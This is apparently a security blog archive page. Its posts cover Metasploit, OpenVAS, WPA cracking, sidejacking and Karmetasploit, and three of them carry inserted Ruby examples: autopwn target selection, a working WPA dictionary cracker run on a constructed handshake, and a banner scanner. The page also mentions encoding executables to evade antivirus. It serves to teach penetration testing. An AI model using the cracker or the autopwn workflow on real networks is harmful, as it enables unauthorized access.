Using chntpw to Bypass Local GPOs
If you have ever been over-zealous in hardening a machine with Group Policy and locked yourself out, you can boot the Offline NT Password & Registry Editor live CD (chntpw) and edit the offline registry so that you are presented with a SYSTEM shell on the next reboot. From that shell you can edit the local GPOs at will. Note that this only helps with local policy: on a domain member, domain GPOs are re-applied at the next policy refresh, so the lockout comes back unless the domain-side policy is fixed as well.
Posted in Uncategorized, Video, security | Comments (0)
Setting Up a Tor Relay Under WinXP
Rather than just sporting a green avatar on Twitter or elsewhere, how about setting up a Tor relay or bridge to really help out the Iranian people? A bridge is the more useful of the two for users behind a censor, since bridges are not listed in the public directory and so are much harder to block.
Posted in Uncategorized | Comments (0)
OpenVAS and db_autopwn on back|track4
I couldn’t believe it when I saw that there wasn’t any real exposure of the fantastic OpenVAS project. For those that don’t know, when Nessus closed its source with version 3, OpenVAS was forked from the last GPL release and has most of the same abilities as Nessus; best of all, it’s completely free.
I figured that a post only showing the setup and scanning with OpenVAS would be pretty dull, so I added in the use of the resulting report with the always entertaining db_autopwn in Metasploit.
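To make the "use the resulting report" step concrete, here is an added example (not Metasploit's or OpenVAS's own code) of how a scanner's NBE export is read and how db_autopwn's two target-selection modes pick exploits from it: -p matches on the port a module defaults to, -x matches on vulnerability references. The NBE text and the module index are constructed for the example; the two SMB module names and their CVEs are real, the web module is a hypothetical placeholder.

```ruby
# Added example, not framework code. The scan report below is constructed.
# NBE result lines have the layout:
#   results|subnet|host|port|plugin_id|severity|description
SAMPLE_NBE = <<~NBE
  timestamps|||scan_start|Sat Jun 20 10:00:00 2009|
  timestamps||192.168.1.10|host_start|Sat Jun 20 10:00:01 2009|
  results|192.168.1|192.168.1.10|ssh (22/tcp)|10267|Security Note|An SSH server is running on this port.
  results|192.168.1|192.168.1.10|microsoft-ds (445/tcp)|11890|Security Hole|The remote host is affected by MS08-067. CVE : CVE-2008-4250
  results|192.168.1|192.168.1.10|general/tcp|19506|Security Note|Scan information
  results|192.168.1|192.168.1.20|http (80/tcp)|10107|Security Warning|A web server is running on this port.
  timestamps||192.168.1.10|host_end|Sat Jun 20 10:05:00 2009|
NBE

Finding = Struct.new(:host, :port, :proto, :severity, :refs, :text)

# Parse NBE into per-port findings. "general/tcp" rows carry no port and are
# host-level notes, so they are skipped; CVE ids are pulled out of the description.
def parse_nbe(text)
  text.each_line.each_with_object([]) do |line, out|
    f = line.chomp.split('|', 7)
    next unless f[0] == 'results'
    host, portspec, severity, desc = f[2], f[3], f[5], f[6].to_s
    m = portspec.match(/\((\d+)\/(tcp|udp)\)/)   # e.g. "ssh (22/tcp)"
    next unless m
    refs = desc.scan(/CVE-\d{4}-\d{4,}/).uniq
    out << Finding.new(host, m[1].to_i, m[2], severity, refs, desc)
  end
end

# Hand-written stand-in for the framework's module list: real SMB module names
# with their default RPORT and CVE references, plus one hypothetical web module.
MODULES = [
  { name: 'exploit/windows/smb/ms08_067_netapi',   port: 445, refs: ['CVE-2008-4250'] },
  { name: 'exploit/windows/smb/ms06_040_netapi',   port: 445, refs: ['CVE-2006-3439'] },
  { name: 'exploit/multi/http/hypothetical_webapp', port: 80,  refs: [] },  # hypothetical
]

# mode :port mirrors "db_autopwn -p" (every module whose default port matches),
# mode :ref mirrors "db_autopwn -x" (only modules whose references match the report).
def autopwn_targets(findings, modules, mode)
  findings.each_with_object([]) do |fnd, out|
    modules.each do |mod|
      hit = case mode
            when :port then mod[:port] == fnd.port
            when :ref  then (mod[:refs] & fnd.refs).any?
            end
      out << [fnd.host, fnd.port, mod[:name]] if hit
    end
  end.uniq
end

if __FILE__ == $0
  findings = parse_nbe(SAMPLE_NBE)
  %i[port ref].each do |mode|
    puts "-- #{mode} matching:"
    autopwn_targets(findings, MODULES, mode).each { |h, p, m| puts "#{h}:#{p} -> #{m}" }
  end
end
```

Running this shows why the two modes feel so different in practice: port matching fires both SMB exploits at 192.168.1.10 and the web module at 192.168.1.20 regardless of whether the hosts are actually vulnerable (noisy, and a good way to crash services), while reference matching launches only ms08_067 against the one host the report flagged, at the cost of depending on the scanner having emitted CVE references at all. db_autopwn was later removed from the framework, but the port-versus-reference trade-off still applies to any scan-to-exploit workflow.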
Posted in Uncategorized | Comments (2)
Cracking WPA Passphrases with coWPAtty
As I was uploading this video, I noticed the guys at Hak5 just did a piece on coWPAtty. Now don’t get me wrong, I like the work that Hak5 does, but sometimes you just want to cut to the chase. I also do a few things a little differently.
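For readers who want to see what coWPAtty is actually doing per candidate passphrase, here is an added example (not coWPAtty's code) of the full chain: PMK from PBKDF2 over the SSID, PTK from the 802.11i PRF over the MACs and nonces, and the EAPOL-Key MIC check that decides whether a guess is right. The four-way handshake values are constructed rather than captured; the SSID "IEEE" with passphrase "password" is chosen so that the PMK can be checked against the 802.11i Annex H test vector. The precompute_pmks helper is the genpmk idea in miniature.

```ruby
require 'openssl'

# Added example, not coWPAtty's code. Handshake values are constructed.

# PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
# The SSID is the salt, which is why a genpmk table only works for one SSID.
def wpa_pmk(passphrase, ssid)
  OpenSSL::PKCS5.pbkdf2_hmac_sha1(passphrase, ssid, 4096, 32)
end

# PRF-512 (802.11i 8.5.1.1): concatenate HMAC-SHA1(PMK, label || 0x00 || data || i).
def wpa_prf512(pmk, label, data)
  out = ''.b
  4.times { |i| out << OpenSSL::HMAC.digest('sha1', pmk, label + "\x00".b + data + [i].pack('C')) }
  out[0, 64]
end

# PTK = PRF-512(PMK, "Pairwise key expansion", min(AA,SPA)||max(AA,SPA)||min(nonces)||max(nonces)).
def wpa_ptk(pmk, aa, spa, anonce, snonce)
  data = [aa, spa].min + [aa, spa].max + [anonce, snonce].min + [anonce, snonce].max
  wpa_prf512(pmk, 'Pairwise key expansion'.b, data)
end

# EAPOL-Key MIC with the KCK (first 16 bytes of the PTK) over the frame with its MIC
# field zeroed: HMAC-MD5 for WPA/TKIP, HMAC-SHA1 truncated to 16 bytes for WPA2/CCMP.
def eapol_mic(kck, eapol_frame, wpa2: true)
  OpenSSL::HMAC.digest(wpa2 ? 'sha1' : 'md5', kck, eapol_frame)[0, 16]
end

# Dictionary attack: PMK -> PTK -> MIC for each word, compared with the captured MIC.
def crack_wpa(hs, wordlist)
  wordlist.each do |word|
    next unless (8..63).cover?(word.bytesize)   # WPA passphrases are 8..63 bytes; skip the rest
    ptk = wpa_ptk(wpa_pmk(word, hs[:ssid]), hs[:aa], hs[:spa], hs[:anonce], hs[:snonce])
    return word if eapol_mic(ptk[0, 16], hs[:eapol], wpa2: hs[:wpa2]) == hs[:mic]
  end
  nil
end

# genpmk-style precomputation: the slow PBKDF2 step done once per (SSID, word).
def precompute_pmks(ssid, wordlist)
  wordlist.each_with_object({}) { |w, h| h[w] = wpa_pmk(w, ssid) }
end

# Constructed handshake for SSID "IEEE" / passphrase "password" (802.11i Annex H vector).
AP_MAC  = ['001122334455'].pack('H*')
STA_MAC = ['66778899aabb'].pack('H*')
ANONCE  = "\xA1".b * 32
SNONCE  = "\xB2".b * 32
EAPOL_M2 = "\x01\x03\x00\x75\x02\x01\x0a\x00".b + "\x00".b * 16 + SNONCE + "\x00".b * 58  # MIC field zeroed
HANDSHAKE = {
  ssid: 'IEEE', wpa2: true, aa: AP_MAC, spa: STA_MAC,
  anonce: ANONCE, snonce: SNONCE, eapol: EAPOL_M2,
  mic: eapol_mic(wpa_ptk(wpa_pmk('password', 'IEEE'), AP_MAC, STA_MAC, ANONCE, SNONCE)[0, 16], EAPOL_M2),
}

if __FILE__ == $0
  puts "PMK(password, IEEE) = #{wpa_pmk('password', 'IEEE').unpack('H*').first}"
  puts "recovered passphrase: #{crack_wpa(HANDSHAKE, %w[letmein 12345678 hunter2 password]).inspect}"
end
```

The cost that matters is the 4096-iteration PBKDF2 per word; everything after the PMK is a handful of HMACs. That is why genpmk tables exist and why they are only reusable against networks sharing the same SSID, and why a non-default SSID alone already invalidates every precomputed table.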
Tags: backtrack, hacking, security, wireless
Posted in Uncategorized, Video | Comments (2)
Side-Jacking with Jasager
Like a lot of people, I’m sure, after hearing about Jasager running on the Fon, I hurried and got it running, only to be left wondering what to do with it.
In this video, I demonstrate a side-jacking attack using Hamster and Ferret against a client connected via Jasager on my Fon.
Tags: fon, jasager, security, sidejacking
Posted in Video | Comments (0)
Maltego Wireless Transforms with back|track4
Maltego is a fantastic tool that doesn’t get nearly as much recognition as it should. In the back|track4 edition of Maltego, the airgraph-ng wireless transforms are included which makes visualizing your data much easier.
I made this video to show just how easy it is to use the wireless transforms.
Tags: recon, security
Posted in Video | Comments (0)
Karmetasploit on back|track4
Since I haven’t run across any videos online showing Karmetasploit and what it can do, I decided to make one myself.
I also put it up on that YouTube thing that all the kids are talking about:
Tags: security
Posted in Video | Comments (1)
Metasploit – Asymmetric Warfare Review
I have been a big fan of Metasploit for a number of years, but I always knew there was a lot that I could still learn about this fantastic tool. It was my good fortune, then, when I found out that one of the dojos at CanSecWest was going to be “Metasploit – Asymmetric Warfare”, taught by none other than HD Moore himself. I knew I had to attend.
If you’re looking to find out how to pop a bunch of boxes in a hurry, this is not the course for you; there are plenty of YouTube videos that can show you how to do that. If, on the other hand, you want to learn how Metasploit is built and how it actually works, then you will not be disappointed. HD Moore will take you from Metasploit’s humble beginnings through to its current state as one of the most flexible and versatile exploitation tools available.
Upon entering class, you are given a USB stick with a BackTrack 4 virtual machine and a nearly up-to-date version of Metasploit (there had been updates to trunk overnight). The USB stick was not necessary or expected, for me at least, but it was still very much appreciated. The class was also outfitted with a hardwired LAN, so grabbing the latest code from Subversion was no problem, and it provided an excellent and fast network to scan.
The course starts off by detailing the architecture of Metasploit: where everything is located within the framework and how it is all put together. I found this portion of the class to be particularly valuable because I, like many people I’m sure, have really only used Metasploit as a quick tool to exploit victims without any real regard for all of the bits and pieces that make it work. Naturally, you learn how to use exploits and payloads, but you also spend a good deal of time on the often neglected auxiliary modules. You even get to create a TCP scanner in one of the labs, which really cements how the framework is put together.
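As an illustration of what that scanner lab teaches about the framework's division of labour, here is an added example, written by the editor rather than taken from the course or from Metasploit, of a TCP banner scanner in plain Ruby. In the framework the Msf::Auxiliary::Scanner mixin owns the loop over RHOSTS and calls the module's run_host once per target; the author writes only run_host. The class and method names here are hypothetical stand-ins for that arrangement, and the target is a constructed loopback service so the code runs without a lab network.

```ruby
require 'socket'
require 'timeout'

# Added example, not framework code. Names are hypothetical stand-ins for the
# Msf::Auxiliary::Scanner arrangement (mixin drives the loop, module supplies run_host).
class TcpBannerScanner
  attr_reader :results

  def initialize(rport, timeout: 2)
    @rport, @timeout, @results = rport, timeout, {}
  end

  # What the scanner mixin does for you: walk the target list and collect per-host results.
  def run(hosts)
    hosts.each { |ip| @results[ip] = run_host(ip) }
    @results
  end

  # The per-host logic a module author writes: connect, read whatever the service
  # volunteers, and report. Services that wait for the client (HTTP) yield no banner.
  def run_host(ip)
    sock = Timeout.timeout(@timeout) { TCPSocket.new(ip, @rport) }
    banner = begin
      Timeout.timeout(@timeout) { sock.readpartial(256) }
    rescue Timeout::Error, EOFError
      nil
    end
    { state: :open, banner: banner && banner.strip }
  rescue Errno::ECONNREFUSED, Errno::EHOSTUNREACH, Timeout::Error
    { state: :closed, banner: nil }
  ensure
    sock.close if sock
  end
end

# Constructed target so the example runs offline: a loopback TCPServer that greets
# with an SSH-style banner, standing in for a host on the class LAN.
def with_fake_service(banner)
  server = TCPServer.new('127.0.0.1', 0)
  port = server.addr[1]
  thread = Thread.new do
    client = server.accept
    client.write(banner)
    client.close
  end
  yield port
ensure
  thread.kill if thread
  server.close if server
end

if __FILE__ == $0
  with_fake_service("SSH-2.0-OpenSSH_5.1p1 Debian-5\r\n") do |port|
    TcpBannerScanner.new(port).run(['127.0.0.1']).each do |ip, r|
      puts "#{ip}:#{port} #{r[:state]} #{r[:banner]}"
    end
  end
end
```

The point the lab makes is visible in the split: everything about host iteration, threading (the framework's THREADS option) and result storage lives outside run_host, so a new scanner module is mostly just the protocol-specific part.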
You learn a great deal about exploits, of course, but most importantly you learn how they are coded and why they are built the way they are, laying the foundation for your own exploit creation if you’re so inclined. You also create executables and encode them in various ways in order to hide them from AV software. HD spent a good deal of time on my favorite feature of Metasploit: the Meterpreter shell. I learned far more than I expected to in this section and realised that I have only been scratching the surface of what it is able to do. The day’s content finishes off with client-side exploits, Karmetasploit, IDS evasion, IPv6, and SMB relay attacks.
The dojo is not, by any means, for the faint of heart. The prerequisites for the course ask for familiarity with Metasploit and Ruby, and you’d be well served to ensure you meet them. There were portions of the class where I wished that I had more experience with Ruby and programming in general.
HD Moore’s teaching style is excellent, and he takes the time to ensure that everyone is able to complete the lab portions of the class with confidence. It is evident that HD knows Metasploit inside out and likes to share his knowledge with others. I came away from this training with a desire to learn even more, which is, in my opinion, the hallmark of a great course. If you ever have the opportunity to take this, or the two-day version of the Metasploit training, I highly recommend it.
Posted in Training | Comments (0)